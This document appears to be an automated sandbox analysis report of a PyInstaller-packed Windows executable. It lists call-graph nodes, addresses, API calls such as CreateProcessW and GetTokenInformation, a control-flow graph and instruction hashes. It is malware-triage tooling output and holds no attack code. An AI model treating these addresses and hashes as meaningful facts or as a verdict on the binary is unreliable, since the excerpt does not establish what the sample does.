17865->17866 17869 7ff712504063 17865->17869 17866->17869 17867 7ff7125047c0 45 API calls 17868 7ff7125040ec 17867->17868 17868->17825 17869->17867 17869->17868 17869->17869 17871 7ff712504440 17870->17871 17872 7ff7125043d8 17870->17872 17871->17825 17872->17871 17873 7ff71250e858 47 API calls 17872->17873 17873->17871 17875 7ff712501b83 17874->17875 17876 7ff712501bb2 17875->17876 17878 7ff712501c6f 17875->17878 17877 7ff712500b80 12 API calls 17876->17877 17880 7ff712501bef 17876->17880 17877->17880 17879 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17878->17879 17879->17880 17880->17825 17882 7ff712501773 17881->17882 17883 7ff7125017a2 17882->17883 17885 7ff71250185f 17882->17885 17884 7ff712500b80 12 API calls 17883->17884 17887 7ff7125017df 17883->17887 17884->17887 17886 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17885->17886 17886->17887 17887->17825 17889 7ff712501f93 17888->17889 17890 7ff712501fc2 17889->17890 17892 7ff71250207f 17889->17892 17891 7ff712500b80 12 API calls 17890->17891 17894 7ff712501fff 17890->17894 17891->17894 17893 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17892->17893 17893->17894 17894->17825 17896 7ff71250e880 17895->17896 17897 7ff71250e8c5 17896->17897 17899 7ff7125047c0 45 API calls 17896->17899 17901 7ff71250e885 __scrt_get_show_window_mode 17896->17901 17904 7ff71250e8ae __scrt_get_show_window_mode 17896->17904 17900 7ff7125107e8 WideCharToMultiByte 17897->17900 17897->17901 17897->17904 17898 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17898->17901 17899->17897 17902 7ff71250e9a1 17900->17902 17901->17825 17902->17901 17903 7ff71250e9b6 GetLastError 17902->17903 17903->17901 17903->17904 17904->17898 17904->17901 17906 7ff712500d53 17905->17906 17907 7ff712500d41 17905->17907 17910 7ff712500d60 17906->17910 17913 7ff712500d9d 17906->17913 17908 7ff712504f08 _get_daylight 11 API calls 17907->17908 17909 7ff712500d46 17908->17909 17911 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17909->17911 17912 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17910->17912 17921 7ff712500d51 17911->17921 17912->17921 17914 7ff712500e46 17913->17914 17916 7ff712504f08 _get_daylight 11 API calls 17913->17916 17915 7ff712504f08 _get_daylight 11 API calls 17914->17915 17914->17921 17918 7ff712500ef0 17915->17918 17917 7ff712500e3b 17916->17917 17919 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17917->17919 17920 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17918->17920 17919->17914 17920->17921 17921->17795 17926 7ff71250ec3d 17922->17926 17923 7ff71250ec42 17924 7ff7125051dd 17923->17924 17925 7ff712504f08 _get_daylight 11 API calls 17923->17925 17924->17769 17924->17776 17927 7ff71250ec4c 17925->17927 17926->17923 17926->17924 17929 7ff71250ec8c 17926->17929 17928 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17927->17928 17928->17924 17929->17924 17930 7ff712504f08 _get_daylight 11 API calls 17929->17930 17930->17927 17932 7ff712508258 17931->17932 17933 7ff712508245 17931->17933 17941 7ff712507ebc 17932->17941 17934 7ff712504f08 _get_daylight 11 API calls 17933->17934 17936 7ff71250824a 17934->17936 17938 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17936->17938 17939 7ff712508256 17938->17939 17939->17096 17948 7ff7125102d8 EnterCriticalSection 17941->17948 17950 7ff7124f85b1 GetTokenInformation 17949->17950 17952 7ff7124f8633 __vcrt_freefls 17949->17952 17951 7ff7124f85d2 GetLastError 17950->17951 17953 7ff7124f85dd 17950->17953 17951->17952 17951->17953 17954 7ff7124f8646 CloseHandle 17952->17954 17955 7ff7124f864c 17952->17955 17953->17952 17956 7ff7124f85f9 GetTokenInformation 17953->17956 17954->17955 17955->17101 17956->17952 17957 7ff7124f861c 17956->17957 17957->17952 17958 7ff7124f8626 ConvertSidToStringSidW 17957->17958 17958->17952 17960 7ff7124fc850 17959->17960 17961 7ff7124f2b74 GetCurrentProcessId 17960->17961 17962 7ff7124f26b0 48 API calls 17961->17962 17963 7ff7124f2bc7 17962->17963 17964 7ff712504bd8 48 API calls 17963->17964 17965 7ff7124f2c10 MessageBoxW 17964->17965 17966 7ff7124fc550 _log10_special 8 API calls 17965->17966 17967 7ff7124f2c40 17966->17967 17967->17111 17969 7ff7124f25e5 17968->17969 17970 7ff712504bd8 48 API calls 17969->17970 17971 7ff7124f2604 17970->17971 17971->17129 18007 7ff712508794 17972->18007 17976 7ff7124f81dc 17975->17976 17977 7ff7124f9390 2 API calls 17976->17977 17978 7ff7124f81fb 17977->17978 17979 7ff7124f8216 ExpandEnvironmentStringsW 17978->17979 17980 7ff7124f8203 17978->17980 17981 7ff7124f823c __vcrt_freefls 17979->17981 17982 7ff7124f2810 49 API calls 17980->17982 17983 7ff7124f8253 17981->17983 17984 7ff7124f8240 17981->17984 18006 7ff7124f820f __vcrt_freefls 17982->18006 17988 7ff7124f8261 GetDriveTypeW 17983->17988 17989 7ff7124f82bf 17983->17989 17985 7ff7124f2810 49 API calls 17984->17985 17985->18006 17986 7ff7124fc550 _log10_special 8 API calls 17987 7ff7124f83af 17986->17987 17987->17125 17987->17127 17993 7ff7124f8295 17988->17993 17994 7ff7124f82b0 17988->17994 18140 7ff712507e08 17989->18140 17995 7ff7124f2810 49 API calls 17993->17995 18133 7ff71250796c 17994->18133 17995->18006 18006->17986 18048 7ff712511558 18007->18048 18107 7ff7125112d0 18048->18107 18128 7ff7125102d8 EnterCriticalSection 18107->18128 18134 7ff71250798a 18133->18134 18137 7ff7125079bd 18133->18137 18134->18137 18152 7ff712510474 18134->18152 18137->18006 18141 7ff712507e24 18140->18141 18142 7ff712507e92 18140->18142 18141->18142 18144 7ff712507e29 18141->18144 18186 7ff7125107c0 18142->18186 18146 7ff712507e41 18144->18146 18147 7ff712507e5e 18144->18147 18161 7ff712507bd8 GetFullPathNameW 18146->18161 18169 7ff712507c4c GetFullPathNameW 18147->18169 18153 7ff71251048b 18152->18153 18154 7ff712510481 18152->18154 18155 7ff712504f08 _get_daylight 11 API calls 18153->18155 18154->18153 18158 7ff7125104a7 18154->18158 18162 7ff712507bfe GetLastError 18161->18162 18163 7ff712507c14 18161->18163 18170 7ff712507c7f GetLastError 18169->18170 18174 7ff712507c95 __vcrt_freefls 18169->18174 18189 7ff7125105d0 18186->18189 18190 7ff7125105fb 18189->18190 18191 7ff712510612 18189->18191 18192 7ff712504f08 _get_daylight 11 API calls 18190->18192 18193 7ff712510637 18191->18193 18194 7ff712510616 18191->18194 18242 7ff7124f456a 18241->18242 18243 7ff7124f9390 2 API calls 18242->18243 18244 7ff7124f458f 18243->18244 18245 7ff7124fc550 _log10_special 8 API calls 18244->18245 18246 7ff7124f45b7 18245->18246 18246->17158 18249 7ff7124f7e2e 18247->18249 18248 7ff7124f7f52 18251 7ff7124fc550 _log10_special 8 API calls 18248->18251 18249->18248 18250 7ff7124f1c80 49 API calls 18249->18250 18254 7ff7124f7eb5 18250->18254 18252 7ff7124f7f83 18251->18252 18252->17158 18253 7ff7124f1c80 49 API calls 18253->18254 18254->18248 18254->18253 18255 7ff7124f4560 10 API calls 18254->18255 18256 7ff7124f9390 2 API calls 18254->18256 18255->18254 18257 7ff7124f7f23 CreateDirectoryW 18256->18257 18257->18248 18257->18254 18259 7ff7124f1613 18258->18259 18260 7ff7124f1637 18258->18260 18379 7ff7124f1050 18259->18379 18262 7ff7124f45c0 108 API calls 18260->18262 18263 7ff7124f164b 18262->18263 18265 7ff7124f1653 18263->18265 18266 7ff7124f1682 18263->18266 18264 7ff7124f1618 18267 7ff7124f162e 18264->18267 18270 7ff7124f2710 54 API calls 18264->18270 18268 7ff712504f08 _get_daylight 11 API calls 18265->18268 18269 7ff7124f45c0 108 API calls 18266->18269 18267->17158 18271 7ff7124f1658 18268->18271 18272 7ff7124f1696 18269->18272 18270->18267 18273 7ff7124f2910 54 API calls 18271->18273 18274 7ff7124f169e 18272->18274 18275 7ff7124f16b8 18272->18275 18276 7ff7124f1671 18273->18276 18277 7ff7124f2710 54 API calls 18274->18277 18278 7ff7125006d4 73 API calls 18275->18278 18276->17158 18279 7ff7124f16ae 18277->18279 18280 7ff7124f16cd 18278->18280 18286 7ff71250004c 74 API calls 18279->18286 18281 7ff7124f16d1 18280->18281 18282 7ff7124f16f9 18280->18282 18283 7ff712504f08 _get_daylight 11 API calls 18281->18283 18284 7ff7124f16ff 18282->18284 18285 7ff7124f1717 18282->18285 18287 7ff7124f16d6 18283->18287 18357 7ff7124f1210 18284->18357 18292 7ff7124f1739 18285->18292 18298 7ff7124f1761 18285->18298 18289 7ff7124f1829 18286->18289 18290 7ff7124f2910 54 API calls 18287->18290 18289->17158 18291 7ff7124f16ef __vcrt_freefls 18290->18291 18293 7ff71250004c 74 API calls 18291->18293 18294 7ff712504f08 _get_daylight 11 API calls 18292->18294 18293->18279 18295 7ff7124f173e 18294->18295 18297 7ff7124f2910 54 API calls 18295->18297 18296 7ff71250039c _fread_nolock 53 API calls 18296->18298 18297->18291 18298->18291 18298->18296 18299 7ff7124f17da 18298->18299 18303 7ff7124f17c5 18298->18303 18410 7ff712500adc 18298->18410 18301 7ff712504f08 _get_daylight 11 API calls 18299->18301 18302 7ff7124f17ca 18301->18302 18305 7ff712504f08 _get_daylight 11 API calls 18303->18305 18305->18302 18307 7ff7124f718b 18306->18307 18309 7ff7124f7144 18306->18309 18307->17158 18309->18307 18443 7ff712505024 18309->18443 18311 7ff7124f41a1 18310->18311 18312 7ff7124f44e0 49 API calls 18311->18312 18313 7ff7124f41db 18312->18313 18314 7ff7124f44e0 49 API calls 18313->18314 18315 7ff7124f41eb 18314->18315 18316 7ff7124f420d 18315->18316 18317 7ff7124f423c 18315->18317 18458 7ff7124f4110 18316->18458 18319 7ff7124f4110 51 API calls 18317->18319 18320 7ff7124f423a 18319->18320 18321 7ff7124f429c 18320->18321 18322 7ff7124f4267 18320->18322 18324 7ff7124f4110 51 API calls 18321->18324 18465 7ff7124f7cf0 18322->18465 18326 7ff7124f42c0 18324->18326 18327 7ff7124f4110 51 API calls 18326->18327 18335 7ff7124f4312 18326->18335 18330 7ff7124f42e9 18327->18330 18328 7ff7124f4393 18331 7ff7124f1950 115 API calls 18328->18331 18330->18335 18337 7ff7124f4110 51 API calls 18330->18337 18334 7ff7124f439d 18331->18334 18332 7ff7124fc550 _log10_special 8 API calls 18333 7ff7124f4297 18333->18332 18338 7ff7124f43a5 18334->18338 18339 7ff7124f43fe 18334->18339 18335->18328 18341 7ff7124f438c 18335->18341 18342 7ff7124f4317 18335->18342 18345 7ff7124f437b 18335->18345 18337->18335 18491 7ff7124f1840 18338->18491 18341->18338 18341->18342 18346 7ff7124f2710 54 API calls 18342->18346 18349 7ff7124f2710 54 API calls 18345->18349 18346->18333 18349->18342 18355 7ff7124f1c80 49 API calls 18354->18355 18356 7ff7124f4474 18355->18356 18356->17158 18358 7ff7124f1268 18357->18358 18359 7ff7124f126f 18358->18359 18360 7ff7124f1297 18358->18360 18361 7ff7124f2710 54 API calls 18359->18361 18363 7ff7124f12d4 18360->18363 18364 7ff7124f12b1 18360->18364 18362 7ff7124f1282 18361->18362 18362->18291 18380 7ff7124f45c0 108 API calls 18379->18380 18381 7ff7124f108c 18380->18381 18382 7ff7124f1094 18381->18382 18383 7ff7124f10a9 18381->18383 18384 7ff7124f2710 54 API calls 18382->18384 18385 7ff7125006d4 73 API calls 18383->18385 18391 7ff7124f10a4 __vcrt_freefls 18384->18391 18386 7ff7124f10bf 18385->18386 18387 7ff7124f10e6 18386->18387 18388 7ff7124f10c3 18386->18388 18393 7ff7124f1122 18387->18393 18394 7ff7124f10f7 18387->18394 18389 7ff712504f08 _get_daylight 11 API calls 18388->18389 18390 7ff7124f10c8 18389->18390 18392 7ff7124f2910 54 API calls 18390->18392 18391->18264 18409 7ff7124f10e1 __vcrt_freefls 18392->18409 18395 7ff7124f1129 18393->18395 18401 7ff7124f113c 18393->18401 18396 7ff712504f08 _get_daylight 11 API calls 18394->18396 18398 7ff7124f1210 92 API calls 18395->18398 18397 7ff7124f1100 18396->18397 18399 7ff7124f2910 54 API calls 18397->18399 18398->18409 18399->18409 18400 7ff71250004c 74 API calls 18402 7ff7124f11b4 18400->18402 18403 7ff71250039c _fread_nolock 53 API calls 18401->18403 18405 7ff7124f11ed 18401->18405 18401->18409 18402->18391 18414 7ff7124f46f0 18402->18414 18403->18401 18406 7ff712504f08 _get_daylight 11 API calls 18405->18406 18407 7ff7124f11f2 18406->18407 18408 7ff7124f2910 54 API calls 18407->18408 18408->18409 18409->18400 18411 7ff712500b0c 18410->18411 18428 7ff71250082c 18411->18428 18415 7ff7124f4700 18414->18415 18416 7ff7124f9390 2 API calls 18415->18416 18444 7ff712505031 18443->18444 18445 7ff71250505e 18443->18445 18446 7ff712504f08 _get_daylight 11 API calls 18444->18446 18447 7ff712504fe8 18444->18447 18448 7ff712505081 18445->18448 18449 7ff71250509d 18445->18449 18450 7ff71250503b 18446->18450 18447->18309 18451 7ff712504f08 _get_daylight 11 API calls 18448->18451 18452 7ff712504f4c 45 API calls 18449->18452 18453 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 18450->18453 18454 7ff712505086 18451->18454 18457 7ff712505091 18452->18457 18455 7ff712505046 18453->18455 18456 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 18454->18456 18455->18309 18456->18457 18457->18309 18459 7ff7124f4136 18458->18459 18460 7ff712504984 49 API calls 18459->18460 18461 7ff7124f415c 18460->18461 18462 7ff7124f416d 18461->18462 18463 7ff7124f4560 10 API calls 18461->18463 18462->18320 18464 7ff7124f417f 18463->18464 18464->18320 18466 7ff7124f7d05 18465->18466 18467 7ff7124f45c0 108 API calls 18466->18467 18468 7ff7124f7d2b 18467->18468 18469 7ff7124f45c0 108 API calls 18468->18469 18482 7ff7124f7d52 18468->18482 18470 7ff7124f7d42 18469->18470 18472 7ff7124f7d4d 18470->18472 18473 7ff7124f7d5c 18470->18473 18471 7ff7124fc550 _log10_special 8 API calls 18474 7ff7124f4277 18471->18474 18474->18333 18482->18471 18522 7ff712505ec8 18521->18522 18523 7ff712505eee 18522->18523 18526 7ff712505f21 18522->18526 18524 7ff712504f08 _get_daylight 11 API calls 18523->18524 18525 7ff712505ef3 18524->18525 18527 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 18525->18527 18528 7ff712505f34 18526->18528 18529 7ff712505f27 18526->18529 18539 7ff7124f4616 18527->18539 18540 7ff71250ac28 18528->18540 18530 7ff712504f08 _get_daylight 11 API calls 18529->18530 18530->18539 18539->17189 18553 7ff7125102d8 EnterCriticalSection 18540->18553 18913 7ff7125078f8 18912->18913 18916 7ff7125073d4 18913->18916 18915 7ff712507911 18915->17199 18917 7ff7125073ef 18916->18917 18918 7ff71250741e 18916->18918 18919 7ff71250a814 _invalid_parameter_noinfo 37 API calls 18917->18919 18926 7ff71250546c EnterCriticalSection 18918->18926 18925 7ff71250740f 18919->18925 18925->18915 18928 7ff7124ffe43 18927->18928 18929 7ff7124ffe71 18927->18929 18930 7ff71250a814 _invalid_parameter_noinfo 37 API calls 18928->18930 18931 7ff7124ffe63 18929->18931 18937 7ff71250546c EnterCriticalSection 18929->18937 18930->18931 18931->17203 18939 7ff7124f45c0 108 API calls 18938->18939 18940 7ff7124f1493 18939->18940 18941 7ff7124f149b 18940->18941 18942 7ff7124f14bc 18940->18942 18943 7ff7124f2710 54 API calls 18941->18943 18944 7ff7125006d4 73 API calls 18942->18944 18945 7ff7124f14ab 18943->18945 18946 7ff7124f14d1 18944->18946 18945->17229 18947 7ff7124f14d5 18946->18947 18948 7ff7124f14f8 18946->18948 18949 7ff712504f08 _get_daylight 11 API calls 18947->18949 18951 7ff7124f1532 18948->18951 18952 7ff7124f1508 18948->18952 18950 7ff7124f14da 18949->18950 18953 7ff7124f2910 54 API calls 18950->18953 18955 7ff7124f1538 18951->18955 18963 7ff7124f154b 18951->18963 18954 7ff712504f08 _get_daylight 11 API calls 18952->18954 18960 7ff7124f14f3 __vcrt_freefls 18953->18960 18956 7ff7124f1510 18954->18956 18957 7ff7124f1210 92 API calls 18955->18957 18958 7ff7124f2910 54 API calls 18956->18958 18957->18960 18958->18960 18959 7ff71250004c 74 API calls 18961 7ff7124f15c4 18959->18961 18960->18959 18961->17229 18962 7ff71250039c _fread_nolock 53 API calls 18962->18963 18963->18960 18963->18962 18964 7ff7124f15d6 18963->18964 18965 7ff712504f08 _get_daylight 11 API calls 18964->18965 18966 7ff7124f15db 18965->18966 18967 7ff7124f2910 54 API calls 18966->18967 18967->18960 18969 7ff7124f9390 2 API calls 18968->18969 19045 7ff7124f6375 19044->19045 19046 7ff7124f1c80 49 API calls 19045->19046 19047 7ff7124f63b1 19046->19047 19048 7ff7124f63dd 19047->19048 19049 7ff7124f63ba 19047->19049 19051 7ff7124f4630 49 API calls 19048->19051 19050 7ff7124f2710 54 API calls 19049->19050 19074 7ff7124f63d3 19050->19074 19052 7ff7124f63f5 19051->19052 19053 7ff7124f6413 19052->19053 19054 7ff7124f2710 54 API calls 19052->19054 19055 7ff7124f4560 10 API calls 19053->19055 19054->19053 19057 7ff7124f641d 19055->19057 19056 7ff7124fc550 _log10_special 8 API calls 19058 7ff7124f336e 19056->19058 19059 7ff7124f642b 19057->19059 19060 7ff7124f8e80 3 API calls 19057->19060 19058->17298 19075 7ff7124f6500 19058->19075 19061 7ff7124f4630 49 API calls 19059->19061 19060->19059 19062 7ff7124f6444 19061->19062 19063 7ff7124f6469 19062->19063 19064 7ff7124f6449 19062->19064 19066 7ff7124f8e80 3 API calls 19063->19066 19065 7ff7124f2710 54 API calls 19064->19065 19065->19074 19067 7ff7124f6476 19066->19067 19074->19056 19224 7ff7124f5400 19075->19224 19077 7ff7124f6526 19078 7ff7124f653f 19077->19078 19079 7ff7124f652e 19077->19079 19231 7ff7124f4c90 19078->19231 19080 7ff7124f2710 54 API calls 19079->19080 19086 7ff7124f653a 19080->19086 19226 7ff7124f542c 19224->19226 19225 7ff7124f5434 19225->19077 19226->19225 19229 7ff7124f55d4 19226->19229 19255 7ff712506aa4 19226->19255 19227 7ff7124f5797 __vcrt_freefls 19227->19077 19228 7ff7124f47d0 47 API calls 19228->19229 19229->19227 19229->19228 19232 7ff7124f4cc0 19231->19232 19256 7ff712506ad4 19255->19256 19259 7ff712505fa0 19256->19259 19260 7ff712505fe3 19259->19260 19261 7ff712505fd1 19259->19261 19317->17306

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF7124F89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff7124f89e0-7ff7124f8b26 call 7ff7124fc850 call 7ff7124f9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7125053f0 call 7ff71250a47c call 7ff71250871c call 7ff7125053f0 call 7ff71250a47c call 7ff71250871c call 7ff7125053f0 call 7ff71250a47c call 7ff71250871c GetCommandLineW CreateProcessW 23 7ff7124f8b4d-7ff7124f8b89 RegisterClassW 0->23 24 7ff7124f8b28-7ff7124f8b48 GetLastError call 7ff7124f2c50 0->24 25 7ff7124f8b91-7ff7124f8be5 CreateWindowExW 23->25 26 7ff7124f8b8b GetLastError 23->26 31 7ff7124f8e39-7ff7124f8e5f call 7ff7124fc550 24->31 28 7ff7124f8bef-7ff7124f8bf4 ShowWindow 25->28 29 7ff7124f8be7-7ff7124f8bed GetLastError 25->29 26->25 32 7ff7124f8bfa-7ff7124f8c0a WaitForSingleObject 28->32 29->32 34 7ff7124f8c0c 32->34 35 7ff7124f8c88-7ff7124f8c8f 32->35 37 7ff7124f8c10-7ff7124f8c13 34->37 38 7ff7124f8cd2-7ff7124f8cd9 35->38 39 7ff7124f8c91-7ff7124f8ca1 WaitForSingleObject 35->39 42 7ff7124f8c15 GetLastError 37->42 43 7ff7124f8c1b-7ff7124f8c22 37->43 40 7ff7124f8dc0-7ff7124f8dd9 GetMessageW 38->40 41 7ff7124f8cdf-7ff7124f8cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff7124f8df8-7ff7124f8e02 39->44 45 7ff7124f8ca7-7ff7124f8cb7 TerminateProcess 39->45 50 7ff7124f8def-7ff7124f8df6 40->50 51 7ff7124f8ddb-7ff7124f8de9 TranslateMessage DispatchMessageW 40->51 48 7ff7124f8d00-7ff7124f8d38 MsgWaitForMultipleObjects PeekMessageW 41->48 42->43 43->39 49 7ff7124f8c24-7ff7124f8c41 PeekMessageW 43->49 52 7ff7124f8e04-7ff7124f8e0a DestroyWindow 44->52 53 7ff7124f8e11-7ff7124f8e35 GetExitCodeProcess CloseHandle * 2 44->53 46 7ff7124f8cbf-7ff7124f8ccd WaitForSingleObject 45->46 47 7ff7124f8cb9 GetLastError 45->47 46->44 47->46 54 7ff7124f8d73-7ff7124f8d7a 48->54 55 7ff7124f8d3a 48->55 56 7ff7124f8c76-7ff7124f8c86 WaitForSingleObject 49->56 57 7ff7124f8c43-7ff7124f8c74 TranslateMessage DispatchMessageW PeekMessageW 49->57 50->40 50->44 51->50 52->53 53->31 54->40 59 7ff7124f8d7c-7ff7124f8da5 QueryPerformanceCounter 54->59 58 7ff7124f8d40-7ff7124f8d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->35 56->37 57->56 57->57 58->54 58->58 59->48 60 7ff7124f8dab-7ff7124f8db2 59->60 60->44 61 7ff7124f8db4-7ff7124f8db8 60->61 61->40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction ID: de895dd2365ba0ef98c58d2bfce7aa97faa4e608715dfdfbf80a4aa30cc44fd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DD15432B08E9286FB10AF34E8942ADB760FF84768F800235DE5D46A95DFBCD559C710
                                                                                                                                                                                                                                          Function 00007FF7124F1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 62 7ff7124f1000-7ff7124f3806 call 7ff7124ffe18 call 7ff7124ffe20 call 7ff7124fc850 call 7ff7125053f0 call 7ff712505484 call 7ff7124f36b0 76 7ff7124f3814-7ff7124f3836 call 7ff7124f1950 62->76 77 7ff7124f3808-7ff7124f380f 62->77 83 7ff7124f391b-7ff7124f3931 call 7ff7124f45c0 76->83 84 7ff7124f383c-7ff7124f3856 call 7ff7124f1c80 76->84 78 7ff7124f3c97-7ff7124f3cb2 call 7ff7124fc550 77->78 90 7ff7124f3933-7ff7124f3960 call 7ff7124f7f90 83->90 91 7ff7124f396a-7ff7124f397f call 7ff7124f2710 83->91 87 7ff7124f385b-7ff7124f389b call 7ff7124f8830 84->87 95 7ff7124f38c1-7ff7124f38cc call 7ff712504f30 87->95 96 7ff7124f389d-7ff7124f38a3 87->96 103 7ff7124f3984-7ff7124f39a6 call 7ff7124f1c80 90->103 104 7ff7124f3962-7ff7124f3965 call 7ff71250004c 90->104 99 7ff7124f3c8f 91->99 111 7ff7124f38d2-7ff7124f38e1 call 7ff7124f8830 95->111 112 7ff7124f39fc-7ff7124f3a06 call 7ff7124f8940 95->112 100 7ff7124f38a5-7ff7124f38ad 96->100 101 7ff7124f38af-7ff7124f38bd call 7ff7124f89a0 96->101 99->78 100->101 101->95 113 7ff7124f39b0-7ff7124f39b9 103->113 104->91 120 7ff7124f39f4-7ff7124f39f7 call 7ff712504f30 111->120 121 7ff7124f38e7-7ff7124f38ed 111->121 118 7ff7124f3a0b-7ff7124f3a2a call 7ff7124f89a0 * 3 112->118 113->113 116 7ff7124f39bb-7ff7124f39d8 call 7ff7124f1950 113->116 116->87 130 7ff7124f39de-7ff7124f39ef call 7ff7124f2710 116->130 138 7ff7124f3a2f-7ff7124f3a3e call 7ff7124f8830 118->138 120->112 126 7ff7124f38f0-7ff7124f38fc 121->126 127 7ff7124f3905-7ff7124f3908 126->127 128 7ff7124f38fe-7ff7124f3903 126->128 127->120 131 7ff7124f390e-7ff7124f3916 call 7ff712504f30 127->131 128->126 128->127 130->99 131->138 141 7ff7124f3b45-7ff7124f3b53 138->141 142 7ff7124f3a44-7ff7124f3a47 138->142 143 7ff7124f3b59-7ff7124f3b5d 141->143 144 7ff7124f3a67 141->144 142->141 145 7ff7124f3a4d-7ff7124f3a50 142->145 146 7ff7124f3a6b-7ff7124f3a90 call 7ff712504f30 143->146 144->146 147 7ff7124f3a56-7ff7124f3a5a 145->147 148 7ff7124f3b14-7ff7124f3b17 145->148 157 7ff7124f3a92-7ff7124f3aa6 call 7ff7124f8940 146->157 158 7ff7124f3aab-7ff7124f3ac0 146->158 147->148 149 7ff7124f3a60 147->149 150 7ff7124f3b2f-7ff7124f3b40 call 7ff7124f2710 148->150 151 7ff7124f3b19-7ff7124f3b1d 148->151 149->144 159 7ff7124f3c7f-7ff7124f3c87 150->159 151->150 153 7ff7124f3b1f-7ff7124f3b2a 151->153 153->146 157->158 161 7ff7124f3ac6-7ff7124f3aca 158->161 162 7ff7124f3be8-7ff7124f3bfa call 7ff7124f8830 158->162 159->99 164 7ff7124f3ad0-7ff7124f3ae8 call 7ff712505250 161->164 165 7ff7124f3bcd-7ff7124f3be2 call 7ff7124f1940 161->165 170 7ff7124f3c2e 162->170 171 7ff7124f3bfc-7ff7124f3c02 162->171 175 7ff7124f3b62-7ff7124f3b7a call 7ff712505250 164->175 176 7ff7124f3aea-7ff7124f3b02 call 7ff712505250 164->176 165->161 165->162 177 7ff7124f3c31-7ff7124f3c40 call 7ff712504f30 170->177 173 7ff7124f3c04-7ff7124f3c1c 171->173 174 7ff7124f3c1e-7ff7124f3c2c 171->174 173->177 174->177 184 7ff7124f3b7c-7ff7124f3b80 175->184 185 7ff7124f3b87-7ff7124f3b9f call 7ff712505250 175->185 176->165 186 7ff7124f3b08-7ff7124f3b0f 176->186 187 7ff7124f3c46-7ff7124f3c4a 177->187 188 7ff7124f3d41-7ff7124f3d63 call 7ff7124f44e0 177->188 184->185 199 7ff7124f3ba1-7ff7124f3ba5 185->199 200 7ff7124f3bac-7ff7124f3bc4 call 7ff712505250 185->200 186->165 190 7ff7124f3cd4-7ff7124f3ce6 call 7ff7124f8830 187->190 191 7ff7124f3c50-7ff7124f3c5f call 7ff7124f90e0 187->191 197 7ff7124f3d65-7ff7124f3d6f call 7ff7124f4630 188->197 198 7ff7124f3d71-7ff7124f3d82 call 7ff7124f1c80 188->198 203 7ff7124f3d35-7ff7124f3d3c 190->203 204 7ff7124f3ce8-7ff7124f3ceb 190->204 208 7ff7124f3cb3-7ff7124f3cb6 call 7ff7124f8660 191->208 209 7ff7124f3c61 191->209 213 7ff7124f3d87-7ff7124f3d96 197->213 198->213 199->200 200->165 221 7ff7124f3bc6 200->221 210 7ff7124f3c68 call 7ff7124f2710 203->210 204->203 211 7ff7124f3ced-7ff7124f3d10 call 7ff7124f1c80 204->211 220 7ff7124f3cbb-7ff7124f3cbd 208->220 209->210 222 7ff7124f3c6d-7ff7124f3c77 210->222 228 7ff7124f3d12-7ff7124f3d26 call 7ff7124f2710 call 7ff712504f30 211->228 229 7ff7124f3d2b-7ff7124f3d33 call 7ff712504f30 211->229 218 7ff7124f3dc4-7ff7124f3dda call 7ff7124f9390 213->218 219 7ff7124f3d98-7ff7124f3d9f 213->219 234 7ff7124f3ddc 218->234 235 7ff7124f3de8-7ff7124f3e04 SetDllDirectoryW 